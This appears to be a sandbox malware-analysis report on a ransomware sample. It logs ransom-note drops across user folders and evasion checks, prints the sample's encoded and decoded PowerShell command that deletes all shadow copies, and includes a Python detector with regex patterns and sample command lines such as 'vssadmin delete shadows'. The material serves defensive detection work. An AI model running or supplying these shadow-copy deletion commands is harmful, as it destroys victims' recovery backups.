        Source: classification engineClassification label: mal100.rans.evad.winEXE@5/209@0/0
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000948DE GetDriveTypeW,GetDiskFreeSpaceExW,0_2_000948DE
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009500F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_0009500F
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\program files\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\3zvp3joi3-readme.txt
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_01
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeMutant created: \Sessions\1\BaseNamedObjects\Global\B6CC837D-86BE-A32B-F1A9-2E0B99BA279D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzeglomx.3eq.ps1
        Source: F73BkMlJhw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: F73BkMlJhw.exeVirustotal: Detection: 68%
        Source: F73BkMlJhw.exeReversingLabs: Detection: 79%
        Source: unknownProcess created: C:\Users\user\Desktop\F73BkMlJhw.exe 'C:\Users\user\Desktop\F73BkMlJhw.exe'
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Source: unknownProcess created: C:\Windows\System32\wbem\unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeDirectory created: c:\program files\3zvp3joi3-readme.txt
        Source: F73BkMlJhw.exeStatic PE information: section name: .i6x
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: C:\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\program files\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\program files (x86)\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\recovery\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\jay jay hammer\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\desktop\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\documents\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\downloads\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\favorites\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\links\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\music\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\pictures\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\saved games\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\videos\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\accountpictures\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\desktop\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\documents\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\downloads\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\libraries\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\music\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\pictures\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\videos\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\3d objects\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\contacts\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\downloads\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\favorites\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\links\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\music\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\onedrive\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\pictures\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\recent\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\saved games\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\searches\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\videos\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\afwaafrxko\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\aixacvybsb\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\bpmlnobvsb\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\dtbzgiooso\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\htagvdfuie\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\jsdngycowy\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\ltkmybseyz\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\mnulncriyc\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\mxpxcvpdvn\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\psamnljhzw\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\zsszyefymu\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\ztgjilhxqb\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\20200719\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\afwaafrxko\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\aixacvybsb\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\bpmlnobvsb\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\dtbzgiooso\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\htagvdfuie\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\jsdngycowy\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\ltkmybseyz\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\mnulncriyc\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\mxpxcvpdvn\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\psamnljhzw\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\zsszyefymu\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\ztgjilhxqb\3zvp3joi3-readme.txt
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\favorites\links\3zvp3joi3-readme.txt
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        Contains functionality to detect sleep reduction / modifications
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_0009559A
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_000954F0 rdtsc
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_00093839 OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Window / User API: threadDelayed 10000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2072
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2180
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe TID: 4664 Thread sleep count: 10000 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828 Thread sleep count: 2072 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1164 Thread sleep count: 2180 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5040 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe File Volume queried: C:\ FullSizeInformation
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_000970C1 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_00094FDB GetSystemInfo
        Source: F73BkMlJhw.exe, 00000000.00000002.863029088.0000000004330000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: F73BkMlJhw.exe, 00000000.00000002.863029088.0000000004330000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: F73BkMlJhw.exe, 00000000.00000002.863029088.0000000004330000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: F73BkMlJhw.exe, 00000000.00000002.863029088.0000000004330000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_000954F0 rdtsc
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_00094C8C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_00094FF2 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_00094409 HeapCreate,GetProcessHeap
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion:

        Encrypted powershell cmdline option found
        Source: unknown Process created: Base64 decoded Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Process created: Base64 decoded Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_000945C2 OpenProcess,QueryFullProcessImageNameW,PathFindFileNameW, svchost.exe
        Source: F73BkMlJhw.exe, 00000000.00000002.862248702.0000000001950000.00000002.00000001.sdmp, unsecapp.exe, 00000003.00000002.862395778.0000020C81700000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
        Source: F73BkMlJhw.exe, 00000000.00000002.862248702.0000000001950000.00000002.00000001.sdmp, unsecapp.exe, 00000003.00000002.862395778.0000020C81700000.00000002.00000001.sdmp Binary or memory string: Progman
        Source: F73BkMlJhw.exe, 00000000.00000002.862248702.0000000001950000.00000002.00000001.sdmp, unsecapp.exe, 00000003.00000002.862395778.0000020C81700000.00000002.00000001.sdmp Binary or memory string: RProgram Managerm
        Source: F73BkMlJhw.exe, 00000000.00000002.862248702.0000000001950000.00000002.00000001.sdmp, unsecapp.exe, 00000003.00000002.862395778.0000020C81700000.00000002.00000001.sdmp Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_000946E2 cpuid
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe Code function: 0_2_00094D32 GetUserNameW
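        The shadow copy deletion above only becomes visible after the -EncodedCommand argument is decoded, so a process-creation detection has to do that decoding itself rather than matching the raw command line. The Python below is an added example and not part of this report or of the sample: it decodes the Base64/UTF-16LE argument that powershell.exe expects behind -EncodedCommand (and its accepted prefixes such as -e and -enc), then matches the decoded script, or the plain command line when nothing is encoded, against shadow-copy-deletion indicators. The decoded script string is the one the report shows; the surrounding command lines, the indicator names and all function names are constructed for illustration.

```python
import base64
import binascii
import re
from typing import Optional

# Decoded script as shown in the report: the sample launched it through an
# encoded PowerShell command line to delete Volume Shadow Copies.
DECODED_FROM_REPORT = "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"

# Indicators of shadow copy deletion (names are our own), matched case-insensitively
# against the decoded script, or against the raw command line if nothing is encoded.
SHADOW_COPY_PATTERNS = {
    "wmi_shadowcopy_delete": re.compile(r"win32_shadowcopy.*?\.delete\s*\(", re.I | re.S),
    "vssadmin_delete_shadows": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "wmic_shadowcopy_delete": re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
}


def _is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    t = token.lower()
    if not t.startswith("-") or len(t) < 2:
        return False
    return "encodedcommand".startswith(t[1:])


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if there is none.

    PowerShell expects the argument to be Base64 over the UTF-16LE bytes of the script.
    """
    tokens = cmdline.split()
    for i in range(len(tokens) - 1):
        if _is_encoded_flag(tokens[i]):
            blob = tokens[i + 1].strip("\"'")
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None  # flag present but payload not decodable
    return None


def detect_shadow_copy_deletion(cmdline: str) -> dict:
    """Decode the command line if it is encoded, then report matching indicators."""
    script = decode_encoded_command(cmdline)
    haystack = script if script is not None else cmdline
    hits = [name for name, pat in SHADOW_COPY_PATTERNS.items() if pat.search(haystack)]
    return {"encoded": script is not None, "decoded": script, "hits": hits}


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the same way the sample (or an admin) would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not taken from the report). The first wraps the
# report's decoded script the way a process-creation event for the sample would look;
# the second is a benign encoded command; the third deletes shadow copies unencoded.
SAMPLE_CMDLINES = [
    "powershell.exe -ExecutionPolicy Bypass -NoProfile -e " + encode_command(DECODED_FROM_REPORT),
    "powershell.exe -EncodedCommand " + encode_command("Get-Date; Get-Service spooler"),
    "cmd.exe /c vssadmin.exe delete shadows /all /quiet",
]


def scan(cmdlines=SAMPLE_CMDLINES):
    """Return (command line, result) pairs for every line indicating shadow copy deletion."""
    findings = []
    for line in cmdlines:
        result = detect_shadow_copy_deletion(line)
        if result["hits"]:
            findings.append((line, result))
    return findings


if __name__ == "__main__":
    for line, result in scan():
        print("ALERT", result["hits"], "encoded=%s" % result["encoded"])
        print("   ", result["decoded"] or line)
```

        Matching only on the decoded text is what keeps the rule robust against the encoding: the Base64 of a UTF-16LE script changes completely with any whitespace or casing change, so a rule that looks for a fixed Base64 string would miss the next build of the same sample. The decode step also surfaces the script for the analyst, which is what the "Base64 decoded" entries above amount to.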

        Mitre Att&ck Matrix

        Numbers appended to a technique name are the report's signature-hit counts; techniques without a number are the matrix template and were not observed.

        | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
        |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
        | Replication Through Removable Media1 | Windows Management Instrumentation1 | Modify Existing Service1 | Process Injection12 | Masquerading3 | Credential Dumping | Virtualization/Sandbox Evasion2 | Replication Through Removable Media1 | Data from Local System | Data Encrypted1 | Standard Cryptographic Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact1 |
        | Replication Through Removable Media | Service Execution1 | Port Monitors | Accessibility Features | Virtualization/Sandbox Evasion2 | Network Sniffing | Process Discovery3 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Connection Proxy1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Defacement1 |
        | External Remote Services | PowerShell1 | Accessibility Features | Path Interception | Process Injection12 | Input Capture | Application Window Discovery1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Custom Cryptographic Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
        | Drive-by Compromise | Scheduled Task | System Firmware | DLL Search Order Hijacking | Deobfuscate/Decode Files or Information1 | Credentials in Files | Peripheral Device Discovery11 | Logon Scripts | Input Capture | Data Encrypted | Multiband Communication | SIM Card Swap | | Premium SMS Toll Fraud |
        | Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Connection Proxy1 | Account Manipulation | Account Discovery1 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
        | Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | DLL Search Order Hijacking | Brute Force | System Owner/User Discovery1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | | Abuse Accessibility Features |
        | Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Software Packing | Two-Factor Authentication Interception | Security Software Discovery121 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
        | Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Indicator Blocking | Bash History | System Service Discovery1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
        | Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection | Input Prompt | File and Directory Discovery1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction |
        | Trusted Relationship | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Scripting | Keychain | System Information Discovery25 | Taint Shared Content | Audio Capture | Commonly Used Port | Connection Proxy | | | Data Encrypted for Impact |

        Behavior Graph


        Screenshots

        Thumbnails
